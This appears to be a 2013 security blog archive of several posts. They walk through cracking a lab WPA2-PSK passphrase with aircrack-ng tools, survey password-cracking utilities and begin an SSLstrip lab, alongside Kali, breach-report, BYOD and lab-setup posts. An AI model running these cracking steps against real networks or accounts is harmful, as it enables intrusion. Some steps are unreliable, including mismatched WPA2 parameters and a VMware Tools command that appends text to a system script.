Category Archives: General Security

Various security topics

June 9, 2013

Breaking WPA2-PSK with Kali Linux : wireless.

Great post by Aamir Lakhani on breaking WPA2_PSK. The original can be found HERE 

WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most common attacks is against WPA2 is exploiting a weak passphrase.

Below you will find a few easy steps on how to break WPA2 with a weak passphrase.

Breaking the wireless Lab Home Network:

I set up a test network for this blog article. The client box is logging into my wireless Lab test network. This is the network we will break.

Selecting Wireless Network 300x274 Breaking WPA2 PSK with Kali Linux : wireless.

Step 1:

The first step is to verify the router configuration. Normally in a real penetration test we would not have this option, but since this is a home lab I have a little more flexibility.

In this case the lab access point is securing the wireless network Wireless Lab with WPA2-PSK. It using the passphrase Cisco123. You can use any wireless router to setup your wireless lab.

Wireless Lab 156x300 Breaking WPA2 PSK with Kali Linux : wireless.

 Step 2:

We will be using Kali Linux to complete this task. Kali will need a wireless card configured before it can be used by the operating system. I am using the Alfa AWUS051NH adapter. Almost any Alfa wireless adapter will work. I am a big fan of the AWUS051NH adapter because it a duel band adapter. However, this card is very difficult to obtain since it is no longer sold.

Alfa 228x300 Breaking WPA2 PSK with Kali Linux : wireless.

The iwconfig command will show any wireless cards in the system. I am using a RealTek wireless card. Linux ships with the RealTek drivers, making it a Linux plug and play wireless card.

The operating system recognizes a  wireless interface named wlan0.

IWconfig1 1024x319 Breaking WPA2 PSK with Kali Linux : wireless.

Step 3:

My next step will be to enable the wireless interface. This is accomplished issuing the ifconfig wlan0 up command.

ifconfig up Breaking WPA2 PSK with Kali Linux : wireless.

Step 4:

I need to understand what wireless networks my wireless card sees. I issue the iwlist wlan0 scanning command.

iwlist scanning Breaking WPA2 PSK with Kali Linux : wireless.

This command forces the wireless card to scan and report on all wireless networks in the vicinity.

You can see from this example it found my target network: Wireless Lab. It also found the MAC address of my access point: 0E:18:1A:36:D6:22. This is important to note because I want to limit my attack to this specific access point (to ensure we are not attacking or breaking anyone else’s password).

Secondly, we see the AP is transmitting on channel 36.This is important because it allows us to be specific on what wireless channel we will want our wireless card to monitor and capture traffic from.

Wireless Lab2 1024x613 Breaking WPA2 PSK with Kali Linux : wireless.

Step 5:

The next step is to change the wireless card to monitoring mode. This will allow the wireless card to examine all the packets in the air.

We do this by creating a monitor interface using airmon-ng. Issue the airmon-ng command to verify airmon-ng sees your wireless card. From that point create the monitor interface by issuing the command: airmon-ng start wlan0

airmon ng start 1024x599 Breaking WPA2 PSK with Kali Linux : wireless.

Next, run the ifconfig command to verify the monitor interface is created. We can see mon0 is created.

ifcofig 2 Breaking WPA2 PSK with Kali Linux : wireless.

Now verify the interface mon0 has been created.

mon01 1024x196 Breaking WPA2 PSK with Kali Linux : wireless.

Step 6:

Use airodump-ng to capture the WPA2 handshake. The attacker will have to catch someone in the act of authenticating to get a valid capture. Airodump-ng will display a valid handshake when it captures it. It will display the handshake confirmation in the upper right hand corner of the screen.

Note: We will manually connect to the wireless network to force a handshake. In a future post I will show you how to force a reauthorization to make a device automatically disconnect and reconnect without any manual intervention.

We used the following command: airodump-ng mon0 – -bssid 20:aa:4b:1f:b0:10 (to capture packets from our AP) – -channel 6 (to limit channel hopping) – -write BreakingWPA2 (the name of the file we will save to)

airodump-ng mon0 – -bssid 0E:18:1A:36:D6:22 - -channel 36 – -write BreakingWPA2

(make sure there is no space between “- -”)

Newdump1 Breaking WPA2 PSK with Kali Linux : wireless.

To capture the handshake you are dependent on monitoring a legitimate client authenticate to the network. However, it does not mean you have to wait for a client to legitimately authenticate. You can force a client to re-authenticate (which will happen automatically with most clients when you force a deauthorization).

When you see the WPA Handshake Command you know you have captured an valid handshake

example:

newdump2 Breaking WPA2 PSK with Kali Linux : wireless.

Step 7:

We will use aircrack-ng with the dictionary file to crack the password. Your chances of breaking the password are dependent on the password file.

aircrack 1024x74 Breaking WPA2 PSK with Kali Linux : wireless.

The command on  is: aircrack-ng “name of cap file you created” -w “name of your dictionary file”

The BreakingWPA2-01.cap file was created when we ran the airodump-ng command. The valid WPA2 handshake airodump captured is stored in the BreakingWPA2-01.cap file.

Backtrack 5 ships with a basic dictionary. The dictionary file darkc0de.lst is a popular worldlist that ships with BackTrack5. We added our password Cisco123 in this file to make the test run a little smoother

Many attackers use large dictionaries that increase their chances of cracking a passwords. Many dictionaries contain passwords from real users and websites that have been cracked and posted on the Internet. Some sophisticated dictionaries combine multiple languages, permutations of each word, and key words and phrases from social media sites such as Twitter and Facebook.

Kali does not come with the darkc0de.lst but you can download it from here

In this blog we created a file named “sample.lst” and added the word Cisco123 in it.

Success:

If the password is found in the dictionary file then Aircrack-ng will crack it.

aircrack WPA 1024x531 Breaking WPA2 PSK with Kali Linux : wireless.

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

Leave a Comment

Filed under General Security

Tagged as , , , , , , , , , , , , , , , , , , , , , , , , ,

June 1, 2013

Are Mermaids, Aliens and Vampires Real? Researching Bogus Stories

Blogdoc5 Are Mermaids, Aliens and Vampires Real? Researching Bogus Stories

There are documentaries popping up that showcase outrageous claims such as the government hiding captured mermaids or encounters with aliens. I’ve heard friends and coworkers talk about such things around the water cooler believing the stories are real based on fake videos and actors posing as specialists. Movies like The Blair Witch Project and The Forth Kind present fictional stories as documentaries, however most people figured out they are not real based on being available at major movie theaters. Some documentaries have been seen on TV networks displaying “A Speculative Documentary”, which doesn’t clearly translate to fictional footage.

A recent example of a fake documentary is MERMAIDS: THE NEW EVIDENCE claiming Mermaids are real. The documentary has been seen on the Discovery Channel and Animal Planet side by side with real documentaries making it seem creditable. The documentary includes camera footage of a Mermaid found on a beach as well as research by various specialists. The film claims mermaids are hiding in deep ocean waters to avoid military sonar that causes brain hemorrhaging in some aquatic life. At first glance, the concept seems plausible to some people.

I decided to show research used to qualify documentaries such as this. Here are some steps to prove Mermaids: The New Evidence is fake.

Step 1: General Research

Blogdoc4 Are Mermaids, Aliens and Vampires Real? Researching Bogus Stories

Google is your friend. In many cases, you will find general conversations about a subject that may lead to evidence of the truth. A Google search on the mermaid film shows a number of people pointing out how the film is not real. WIKI had the passaged above confirming the film is fake. This research exercise pretty much sealed the deal (and took less than a minute) however I continued gathering evidence in the event the general public as well as WIKI is wrong (which sometimes happens).

Step 2: Look At The Website 

docblog1 Are Mermaids, Aliens and Vampires Real? Researching Bogus Stories

There is a website associated with the documentary “believeinmermaids.com” that displays The Department of Justice has seized all evidence of mermaids presented in the film. Why would DOJ violate the freedom of speech in this manner is beyond me however lets investigate this website.

The first thing to check is the website history using WayBack Machine found at http://archive.org/web/web.php. WayBack Machines shows the entire lifespan of a website and changes to the website. This website was created in 2012, which happens to be around when documentary was filmed. If you select April 1st to show the first version of the website, it shows the DOJ warning has been the only things displayed since day 1.

blogdoc2 Are Mermaids, Aliens and Vampires Real? Researching Bogus Stories

The next question is who owns the website? By looking at the WHOIS information at http://whois.net/, I can see believeinmermaids.com is owned by Discovery Communications, LLC. Ok, so the Discovery Channel created the believeinmermaids footage the week of the filming. Pretty obvious it was created to drive attendance to the film rather than be a real website featuring controversial evidence.

Blogdoc3 Are Mermaids, Aliens and Vampires Real? Researching Bogus Stories

Step 3: Research People

The mermaids documentary featured lots of evidence from a few scientist including Dr. Paul Robinson. Usually a marine biologist seen on TV would have lots of published creditable information however searching “Dr. Paul Robinson marine biologist” drummed up the actors real name Andre Weideman. Searching Andre Weideman confirmed his role in the fake mermaid documentary.

Blogdoc6 Are Mermaids, Aliens and Vampires Real? Researching Bogus Stories

Screen Shot 2013 06 01 at 4.10.39 PM Are Mermaids, Aliens and Vampires Real? Researching Bogus Stories

Hopefully this post educates people on how to qualify concepts prior to believing anything told by public networks. Similar research tactics should be used when considering questionable specialists such as physic mediums or historical events that seem to be fishy. Knowing is half the battle.

VN:F [1.9.22_1171]
Rating: 5.0/5 (2 votes cast)

Leave a Comment

Filed under General Security

Tagged as , , , , , , , , , , , , , , , , , , , , ,

May 27, 2013

Kali Linux – The next generation for BackTrack

kali new dawn blog Kali Linux – The next generation for BackTrack

Written by Aamir Lakhani, www.DrChaos.com and Joey Muniz www.thesecurityblogger.com. Article is cross posted.

BackTrack is a digital forensics and penetration testing arsenal used by many security professionals and malicious hackers. The last release of BackTrack was 5r3 and many expected a new release sometime in 2013. The creators of BackTrack decided to start from the ground up building a full-fledged operating system and release a next generation penetration distribution rather than updating the existing live CD release. The creators note “Kali Linux is a more mature, secure and enterprise-ready version of BackTrack Linux”.

Screen Shot 2013 05 23 at 4.21.10 PM Kali Linux – The next generation for BackTrack

 Lifeline of BackTrack ending with Kali 1.0

Kali Linux has many advantages over Backtrack. Kali comes with more updated tools. The tools and streamlined with Debian repositories and synchronized four times a day. That means users have the latest package updates and security fixes. The new compliant file systems translate into running most tools from anywhere on the system. Kali has also made customization, unattended installation, and flexible desktop environments and strong feature in Kali Linux.

Kali Linux offers a number of customized tools designed for penetration testing. Tools are categorized in the following groups as seen in dropdown menu shown below.

kaliCatalog Kali Linux – The next generation for BackTrack

Main Tool Categories in Kali Linux

Most of the useful tools from BackTrack made it into Kali with updated versions as well as some new stuff. For example, Vega and Proxy Strike are updated, while tools like Grendel-scan were removed. One interesting catalog is the separate Top 10 Security tools listing.

Blog1 Kali Linux – The next generation for BackTrack

Top 10 Security Tools in Kali Catalog

Kali Linux does have some limitations to its predecessor BackTrack. Some tools do not operate correctly in the new environment or require customization to gain stability. Some of these limitations will probably be fixed in updates. Within a few minutes of using Kali, we realized that darkc0de.lst dictionary file wasn’t loaded with Kali, or get SET needed some reconfiguration for updates to work. Most of these gotchas are well documented and a simple Google search will get you to the right place.

Sticking with the last release of BackTrack 5 RC3 has some advantages such as having more streamlined installation options on various operating systems. One huge limitation for Kali is support in a large VMware ESXI server environment due to VMTools not running on the 64-bit version of Kali. There is a workaround using 32-bit images with VM Tools preinstalled that is downloadable from the Kali website. If you want to install VMware Tools natively on the Kali Linux ISO (including 64-bit versions of the ISO) than check out our HowTo Install VMware Tools On Kali Linux.

BackTrack also has much more content available online as a veteran to Kali’s 1.0 release.

So far I like the new platform and have been using it for multiple projects. I haven’t had issues running Kali on a MacBook Pro as a VMware fusion server as well as MACMINI hosting ESXI 5.1 (note the MACMINI operates like a desktop therefor avoiding issues found with ESXI server farms.). I recommend checking out the new release at http://www.kali.org/.

Aamir Lakhani (www.DrChaos.Com) and Joey Muniz (www.thesecurityblogger.com) are co-writing a new book on Kali for Web Penetration Testing.  Stay tuned for details!

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Leave a Comment

Filed under General Security

Tagged as , , , , , , , , , , , , , , , , , , , , , , , , , , ,

May 26, 2013

Installing VMware Tools on Kali Linux

Great find and post by Aamir Lakhani. Check out the original HERE

If you are using Kali Linux and trying to use it in a VM environment as a guest operating system on VMware,  you may run into some issues. It is recommended that you install VM Tools for VMware on Kali Linux.

This guide will help you install VM Tools on any installation of Kali Linux (including 64-bit ISOs). It will also allow you to use Kali Linux in VMware ESXi environments.

The first thing you need to do on Kali Linux is prep the system for VM Tools. You do so by issuing the following commands:

Note: all commands are typed as one line in the terminal

  •  echo cups enabled >> /usr/sbin/update-rc.d
  • echo vmware-tools enabled >> /usr/sbin/update-rc.d
  • apt-get install gcc make linux-headers-$(uname -r)

VMtools ommands 2 1024x617 Installing VMware Tools on Kali Linux

Note: This is typed as one line

ln -s /usr/src/linux-headers-$(uname -r)/include/generated/uapi/linux/version.h /usr/src/linux-headers-$(uname -r)/include/linux/

VMtools ommands 3 1024x83 Installing VMware Tools on Kali Linux

Now you are ready to mount the VM Tools CD. Simply go to the menu in VMWare and install VM Tools.

VMtools ommands 3 1024x831 Installing VMware Tools on Kali Linux

Now you are ready to mount the VM Tools CD. Simply go to the menu in VMWare and install VM Tools.

VMtools ommands 4 Installing VMware Tools on Kali Linux

Now go back to Kali Linux and use the following commands:

  • mkdir /mnt/vmware
  • mount /dev/cdrom /mnt/vmware/
  • cp -rf /mnt/vmware/VMwareTools* /tmp/

VMtools ommands 5 Installing VMware Tools on Kali Linux

Next, you will change to the /tmp directory and run the VM Tools installation script.

  • cd /tmp/
  • tar zxpf VMwareTools-*.tar.gz
  • cd vmware-tools-distrib/

Vmtoolsnew1 Installing VMware Tools on Kali Linux

Lastly type: “ ./vmware-tools-install.pl” to run the VM Tools installation script. Follow the onscreen instructions when you run the script.

What is Kali Linux and how is it different from Backrack? Check out our Kali Linux introduction on www.DrChaos.com

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Leave a Comment

Filed under General Security

Tagged as , , , , , , , , , , , , , , , , , ,

May 16, 2013

SSL Strip – Breaking Secure Websites

Aamir Lakhani wrote a overview of how to perform a ssl strip attack. The original post can be found HERE

SSLSTRIP LAB

Before beginning the lab, make sure you have Backtrack 5 R3 VM imported into VMWare Player/Workstation/Server/Fusion, or what ever Virtual machine environment you have chosen to utilize.

The following is an excerpt from the VMWare “Getting started with VMWare Player” VMWare Player 4.0 user guide.

Import an Open Virtualization Format Virtual Machine

You can import an Open Virtualization Format (OVF) virtual machine and run it in Player. Player converts the virtual machine from OVF format to VMware runtime (.vmx) format. You can import both .ovf and .ova files.

OVF is a platform-independent, efficient, extensible, and open packaging and distribution format for virtual machines. For example, you can import OVF virtual machines exported from VMware FusionTM into Player. You can import OVF 1.0 and later files only.

You can also use the standalone OVF Tool to convert an OVF virtual machine to VMware runtime format. The standalone version of the OVF Tool is installed in the Player installation directory under OVFTool. See the OVF Tool User Guide on the VMware Web site for information on using the OVF Tool.

Procedure

  1. In Player, select File > Open a Virtual Machine.
  2. Browse to the .ovf or .ova file and click Open.
  3. Type a name for the virtual machine, type or browse to the directory for the virtual machine files, and click Import. Player performs OVF specification conformance and virtual hardware compliance checks. A status bar indicates the progress of the import process.
  4. If the import fails, click Retry to try again, or click Cancel to cancel the import.

If you retry the import, Player relaxes the OVF specification conformance and virtual hardware compliance checks and you might not be able to use the virtual machine in Player.

After Player successfully imports the OVF virtual machine, the virtual machine appears in the virtual machine library.

Your Lab

In this Lab, we are using Virtual Machine based attack hosts.   The Hosts are Linux based Backtrack 5 R3 (based on Ubuntu Linux).   The reason for using backtrack is that all of the modules, and associated dependencies for this lab are preloaded with the distribution. The module dependencies for SSLStrip are (these are already loaded with Backtrack):

  • Python >= 2.5 (apt-get install python)
  • The python “twisted-web” module (apt-get install python-twisted-web)

Additionally to utilize SSLSTRIP you need (Again already in Backtrack):

  • Arpspoof or Ettercap (this lab we use Arpspoof, Ettercap has issues with wireless)
  • IPChains / IPtables
  • Netstat

Additionally when using backtrack or any Ubuntu distribution, it is a good idea to run APT to updates the existing packages. Backtrack has several custom distribution resources pre configured.

#Use this command to update: apt-get update && apt-get upgrade -y && apt-get dist-upgrade –y

Getting Started 

Once your Backtrack virtual machine is installed and booted use the following credentials to log in:

Username: root
Password: toor

Start the desktop environment by issuing the startx command from the terminal session:

startx SSL Strip – Breaking Secure Websites

Note: It is not mandatory that you utilize a GUI desktop.  But for the purposes of this lab it is recommended.  Those not as familiar working in a Linux command shell will likely find it simpler to switch between the multiple terminal windows needed to perform the upcoming operations.

You should now see an environment similar to the following:

desktop SSL Strip – Breaking Secure Websites

For the purposes of this LAB we will only be using a single interface, your virtual machine might be configured with multiple Ethernet interfaces.  We will need to check if there are multiple (virtual) Ethernet interface enabled.

In the upper left hand corner of the desktop click on the Xterm link.

image3 SSL Strip – Breaking Secure Websites

When see a terminal window open on the desktop you are ready to continue.

  1. Use ifconfig to determine what interfaces are on the virtual machine.

Ifconfig | grep “eth” 

This command will filter out all the miscellaneous and just show us the Ethernet interfaces, like below.

image4 SSL Strip – Breaking Secure Websites

If we do indeed have more then one interface enabled issue the command ifdown  with the interface name to disable it.  If there is an interface named eth1 like shown above issue the command:

 Ifdown eth1

The output should be like what is shown below.

image5 SSL Strip – Breaking Secure Websites Continue reading

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

Leave a Comment

Filed under General Security

Tagged as , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

May 12, 2013

How Hackers Crack Weak Passwords

People use weak password practices to secure critical information. Weak password practices include using the same password for multiple systems regardless of the value of the asset, dictionary words, short phases and keeping the same passwords for extended periods of time. For example, it’s common to find a password on a non-critical asset such as a PlayStation 3 be the same as a person’s bank account login.

The more information an attack knows about your password profile, the more likely they will crack your password. For example, a policy of “6-10 characters with one upper case letter and special character” actually helps an attacker reduce the target space meaning passwords are weaker with the policy. If an hacker captures a password for another system and notices a formula such as ‘<dictionary word>’ followed by ‘<3 numbers>’, it helps the attacker prepare a dictionary attack (utilities such as Crunch makes this easy). Any password shorter than 10 characters is an easy target to brute force attack based on today’s system process power.

Here are some tools that hackers can use to crack your passwords.

How Hackers Crack Weak Passwords

John the Ripper is an old school yet powerful password cracking utility. It has several types of engines that can crack different types of passwords including encryption and hashes. John can detect most hash types (about 90% accurate) and generate matching hash outputs to map back to auto generated passphrases  Attackers like John the Ripper because it’s very customizable

johnrip1 How Hackers Crack Weak PasswordsJohn the Ripper cracked 3 passwords from a Linux shadow file.

hashcat1 How Hackers Crack Weak Passwords

Hashcat is a password cracking utility. Hashcat is multi-thread tool meaning it can handle multiple hashes and password lists during a single attack session. Hashcat offers many attack options such as brute-force, combinator, dictionary, hybrid, mask and rule-based attacks

hashcat2 How Hackers Crack Weak Passwords

Hashcat GUI

Ophcrack

Ophcrack is a Windows password cracker based on rainbow tables (Rainbow tables are pre-computed hash tables). Ophcrack can import hashes from a variety of formats including dumping directly from the SAM files of Microsoft Windows.

ophcrack How Hackers Crack Weak Passwords

Ophcrack Cracking Hashes

Findmyhash

Findmyhash is a python script which uses a free online service to crack hashes. Findmyhash will analyze against multiple website Rainbow tables.

FindMyHashKali How Hackers Crack Weak Passwords Findmyhash running a MD5 hash against multiple websites

Crunch

Crunch is a tool used to generate password lists. This can be extremely helpful if you are able to gather intelligence on how your target creates passwords. For example, if you capture two passwords and notice the target uses a phase followed by random digits, Crunch can be used to quickly generate a list of that phrase followed by all possible random digits. Perfect tool for defeating company password policies!

crunch1 How Hackers Crack Weak PasswordsCreating a password list for the word “pass” followed by any two numbers

cruch2 How Hackers Crack Weak Passwords

Crunch output. List of all combinations of “pass” and two numbers

Chntpw

An alternative to breaking a Windows password is completely bypassing it. Chntpw is a software utility that can reset or remove a Windows passwords. This gives a hacker with access to your Microsoft Windows SAMs file the ability to obtain Administration privileges.

chntpw1 How Hackers Crack Weak PasswordsChntpw options. Option 1 clears the password.

There are many tools available to break weak passwords. Best practices is using a password longer than 10 characters (having a repeated character at the end even helps!),  don’t use dictionary words, change your password periodically, don’t use the same passwords for secure and non secure sources and don’t use a computer that accesses sensitive data for personal use (IE same system for Facebook and configuring routers). I suggest using the first letter of each word of a long sentence so you can remember the password yet the output is random. Hope this helps. All tools shown are free and available on BackTrack / Kali.

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

Leave a Comment

Filed under General Security, Penetration / Hacking

Tagged as , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

May 6, 2013

Verizon’s 2013 Data Breach Investigations Report

VerizonCover1 Verizon’s 2013 Data Breach Investigations ReportVerizon recently released their annual Data Breach Report (download HERE). This report is based on statics from 19 organizations and showcases 621 security breaches and 47,000 security incidents with the goal of educating the public of the current risks from cyber threats. All results are built from first-hand evidence collected during paid external forensic investigations and related intelligence operations conducted by Verizon from 2004 through 2012.

There are a lot of interesting findings that range from most common attacks to popular targets. According to the report, everybody is a target. The report states, “from pubs to public agencies, mom-and-ops to multi-nations, nobody was immune”. Some attacks had as high as 95% success rates such as phishing meaning “most attackers would be able to slap a “guaranteed” sticker on getting a click”. They even call out that most agencies should mentally be thinking they are already compromised.

To break things down, here are some highlights:

  • Who are the targets? – Everybody
  • Who is perpetrating breaches? The majority of attacks are outsiders (92%) however insider is on the rise (14%).
  • How do breaches occur? 76% was based on weak or stolen credentials followed by hacking (52%) and Malware (40%).
  • How sophisticated are the attacks? From a range of High to Very Low, the majority of first breaches were done leveraging Low level attacks. I like how they put it by saying “Would you fire a guided missile at an unlocked screen door”.
  • Who are the Criminals? Organized Crime made up the majority of external attacks (over 50%) while others fell around 20% or less.
  • The leader for espionage was China while Romania followed by the USA lead for financial crimes. Spyware (including keyloggers) is the common method for financial crimes while multiple forms of malware are typical for espionage.
  • Social Engineering took a dip the last two years but is now up according to 2012 (29%)
  • Installing Malware to compromised systems is still the most common vector to be breached.
  • ATM hacking was top of the list for physical crimes. I wonder if this was triggered by Barnaby Jack’s Blackhat.
  • 2/3 of data compromised was data at rest meaning on an asset like a database or file server. 1/3 of the data was compromised when the data was being processed such as Ramp scrapers, skimmers and key loggers. No data was compromised while in transit (IE compromising a backbone router).

Screen Shot 2013 05 06 at 3.40.18 PM Verizon’s 2013 Data Breach Investigations Report

The Verizon report is another confirmation that cyber threats are very real and probably active insider your network. The reports calls out that the most common attacks are easy to execute and have very high success rates (such as phishing campaigns). Standard security products that leverage signatures will not catch many threats called out in this report. The best way to identify these threats is monitoring behavior inside the network and utilize a layered approach to building your security strategy.

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

Leave a Comment

Filed under General Security

Tagged as , , , , , , , , , , , , , , , , , , , , , ,

April 15, 2013

Defining The Difference Between A Penetration Test, Vulnerability Assessment and Security Audit

Defining The Difference Between A Penetration Test, Vulnerability Assessment and Security AuditThe terms Penetration Test, Vulnerability Assessment and Security Audit are often blended together when requested by clients or offered by security service providers. All three terms have security aspects however are very different regarding what purpose they serve as well as the expected deliverable.

Defining The Difference Between A Penetration Test, Vulnerability Assessment and Security Audit

A Security Audit typically means evaluating a system or application’s risk level against a set of standards or baselines. Standards are mandatory rules while baselines are the minimal acceptable level of security. Standards and baselines achieve consistency in security implementations and can be specific to industries, technologies and processes.

Most requests for Security Audits are focused on passing an official audit (IE preparing for a corporate or government audit) or proving the baseline requirements are met for a mandatory set of regulations (HIPAA, PCI, etc.). In many cases, Security Audit services do not include any level of insurance or protection if an audit isn’t successful post services meaning services will only provide information that a client can use to become compliant.

IMPORTANT: In many cases, security audits give customers a false sense of security. Most standards and baselines have a long update process that is unable to keep up with the rapid changes in threats found in today’s cyber world. It is highly recommended to go beyond standards and baselines to raise the level of security to an acceptable level of protection for real world threats.

Defining The Difference Between A Penetration Test, Vulnerability Assessment and Security AuditA Vulnerability Assessment is the process in which network devices, operating systems and application software are scanned in order to identify the presence of known and unknown vulnerabilities. A vulnerability is a gap, error or weakness in how a system is designed, used and protected. When a vulnerability is exploited, it can result in giving unauthorized access, escalation of privileges or denial-of-service to the asset.

Vulnerability Assessments typically stop once a vulnerability is found meaning services doesn’t include executing an attack against the vulnerability to verify if it’s legitimate. A Vulnerability Assessment deliverable provides potential risk associated with all vulnerabilities found with possible remediation steps. There are many tools that can be used to scan for vulnerabilities based on system type, operating system, ports open for communication and other means. Vulnerability Assessments are a valuable way to assess a network for potential security weakness to identify where to invest for future security.

Defining The Difference Between A Penetration Test, Vulnerability Assessment and Security AuditA Penetration Test is attempting to attack vulnerabilities in a similar method of a real malicious attacker. Typically, penetration services are requested when a system or network has exhausted investments in security and seeking to verify if all avenues of security have been covered. The key difference between a Penetration Test and Vulnerability Assessment is a penetration test will act upon vulnerabilities found and verify if they are legit reducing the list of confirmed risk associated with a target.

IMPORTANT: One popular misconception is a Penetration Testing service enhances IT security since services have a higher cost associated than other security services. Penetration Testing does not make IT networks more secure since services evaluates existing security! A customer should not consider a penetration test if there is a belief the target is not completely secure.

Hopefully these definitions help define future security service requests.

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)

1 Comment

Filed under General Security

Tagged as , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,

February 14, 2013

The Importance of a BYOD Policy for Companies

Here is a guest post from Pierluigi Paganini. He is a security researcher for InfoSec Institute. InfoSec Institute is an information security training company now offering a mobile computer forensics course.

The IT landscape is dominated by the rise of paradigms such as cloud computing, mobile networking, and social networking, three concepts that have totally revolutionized the daily user’s experience on the web.

Users, in a more or less conscious way, have now become slaves of the concepts of mobility and connectivity, technological change has been rapid and has involved masses of people as never before. There are a billion people, acting as nodes in a global network and exchanging an unimaginable quantity of data, while ignoring the basic concepts of information security.

-        Which means are used for the data transfer?
-        Are the communications channels secure?
-        Where is the user’s information hosted?
-        What is the impact on user’s private and what is the impact of technological innovation for business?

All of these questions need careful reflection to avoid serious consequences for our data, for our digital identities, for our business.

Every day we read the world “BYOD” in many articles, but how much we know about it?

BYOD is an acronym for “bring your own device” and it refers to the fact that employees, business partners, and other users bring their own mobile computing devices, such as laptops, tablets, and smartphones, to the workplace for use and connectivity on the corporate network and for access to business data. The repercussions, from the security perspective, are extremely serious, because the absence of proper policies regulating the use of these devices exposes user and company to risk of data leak and cyber attacks.

These policies have to address the ways in which employees could use the devices once out of workplace, the mechanisms of access protection to be adopted, data encryption, data accessible by the mobile platform, and limiting the execution of applications that can be run outside the company (e.g., email client or data mining applications).one The Importance of a BYOD Policy for Companies

Suggestions for a secure BYOD policy

The proper management of mobile devices and their use by employees when outside is a critical aspect for the security of enterprises. Companies today may choose to be compliant to different standards and regulation; the majority of them, such as ISO 27001, already cover many aspects that could improve a BYOD policy.

Because the presence of mobile devices inside companies and government agencies has increased at an impressive rate, ordinary business relationships with other enterprises, such as clients and providers, require the definition and the adoption of a proper BYOD policy. Sophos proposed a document titled “BYOD Risks and Rewards” that reports that one in four devices used today for work are either smartphones or tablets.two The Importance of a BYOD Policy for Companies

Figure 1 – Sophos BYOD Survey

The SANS (SysAdmin, Audit, Networking, and Security) Institute in March 2012 published the whitepaper “SANS Mobility/BYOD – Security Survey.” The survey found that “only 9 percent of respondents felt completely aware of all mobile devices accessing their enterprise infrastructure and applications. At the same time, nearly 40 % felt they were fully aware of their devices, while nearly half did not have the level of awareness that they should.”three The Importance of a BYOD Policy for Companies

Figure 2 – SANS Institute -State of Mobile Devices Awareness

Continue reading

VN:F [1.9.22_1171]
Rating: 2.0/5 (1 vote cast)

Leave a Comment

Filed under General Security

Tagged as , , , , , , , , , , , , , , , , , , , , , , , , , , ,

February 5, 2013

My Awesome Portable Lab – Apple Mac mini Running ESXI 5.0 5.1 hosting Cisco ISE, NCS, Backtrack, Lancope and More

applemacmini My Awesome Portable Lab – Apple Mac mini Running ESXI 5.0 5.1 hosting Cisco ISE, NCS, Backtrack, Lancope and MorePart of my job is being an expert on various technologies. This means having hands on experience with the latest products as well as the ability to demonstrate how specific solutions work. Many vendors are virtualizing their solutions making it easier to build a home lab that is portable and light on power usage. My team has researched the best method for a mobile home lab based on price, size, power consumption and noise. After comparing various servers and laptops, we found the Apple Mac mini to be the best choice. It’s small enough to fit in a backpack, low on power consumption, silent and around $1,400 fully loaded.

The Mac mini is 7.7 by 7.7 and comes with standard apple OS and a hdmi display adaptor.  Some monitors may need a VGA adapter, which a adapter can be purchased for $10-25 dollars. You will need a Apple super drive to load the ESXI ISO and possibly some drivers that are lost during the install depending on your Mac mini model and method of install. I’ve heard people doing it with other media methods such as USB storage however I’ve personally only used the super drive for two different Mac minis. Make sure to have a USB mouse and keyboard as well.

This website covers how to install ESXI 5.X on an older Mac mini (2011 or older) HERE. The steps are very straight forward however one lesson learned is you HAVE TO burn the driver disk that will be mounted from a windows computer. I wasted a dozen CDs burning the drivers with my MAC using various tools yet the CD never mounted. You can use any type of device to burn the ESXI software.

My Awesome Portable Lab – Apple Mac mini Running ESXI 5.0 5.1 hosting Cisco ISE, NCS, Backtrack, Lancope and More Continue reading

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)

6 Comments

Filed under Datacenter, General Security

Tagged as , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,